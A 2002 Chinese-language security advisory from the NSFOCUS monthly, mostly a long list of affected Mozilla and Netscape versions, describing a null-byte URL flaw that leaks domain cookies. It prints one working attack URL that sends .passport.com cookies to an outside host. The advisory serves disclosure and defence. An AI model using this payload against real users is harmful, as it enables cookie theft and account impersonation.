首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第28期->最新漏洞
日期:2002-01-20
受影响的系统:
Mozilla Browser 0.9.2
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.2.1
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.3
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.4
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.4.1
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.5
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Mozilla Browser 0.9.6
- AIX 4.3.3
- BeOS 5.0
- BSD/OS 4.2
- FreeBSD 4.0
- IRIX 6.5
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- OpenVMS 7.3 Alpha
- OpenVMS 7.2-2
- OpenVMS 7.2-2 Alpha
- OpenVMS 7.1-2
- OpenVMS 7.1-2 Alpha
- RedHat Linux 7.0 x86
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 sparc
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 6.0 sparc
- Solaris 8.0
- Solaris 7.0
Netscape Communicator 4.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.04
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- SuSE Linux 7.0
Netscape Communicator 4.05
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.06
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.07
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- SuSE Linux 7.0
Netscape Communicator 4.08
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.51
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- SuSE Linux 7.0
Netscape Communicator 4.5BETA
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.6
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.61
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.7
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.72
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.73
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.74
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.75
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- SuSE Linux 7.0
Netscape Communicator 4.76
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.1 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- SuSE Linux 7.0
Netscape Communicator 4.77
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.0
Netscape Communicator 4.78
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Netscape Netscape 4.77 Mac
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Netscape Netscape 6.0 Mac
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Netscape Netscape 6.1
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Netscape Netscape 6.2
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
不受影响系统:
Mozilla Browser 0.9.7
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
Netscape Netscape 6.2.1
- MacOS 9.2.1
- MacOS 9.2
- MacOS 9.1
- MacOS 9.0.4
- MacOS 9.0
- MacOS 10.1.2
- MacOS 10.1.1
- MacOS 10.1
- MacOS 10.0.4
- MacOS 10.0.3
- MacOS 10.0.2
- MacOS 10.0.1
- MacOS 10.0
- Microsoft Windows XP
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 3925
Mozilla是种公开发放、免费使用、开放源码的WEB浏览器,可运行于绝大多数Unix/Linux系统上,也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla,也是一种这样的WEB浏览器。
Cookies常常被WEB站点用来验证用户身份,如果攻击者可以窃取某用户的cookies,就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。
比如在受影响的浏览器中加载如下URL
http://alive.znep.com%00www.passport.com/cgi-bin/cookies
将导致".passport.com"这个域对应的cookies被发往"alive.znep.com"。注意,这个漏洞只能窃取某个域对应的cookies,无法窃取特定主机对应的cookies。
为利用此漏洞不需要活动脚本的支持。
<*来源:Marc Slemko (marcs@znep.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0270.html
*>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
参看漏洞描述,或者访问
http://alive.znep.com/~marcs/security/mozillacookie/demo.html
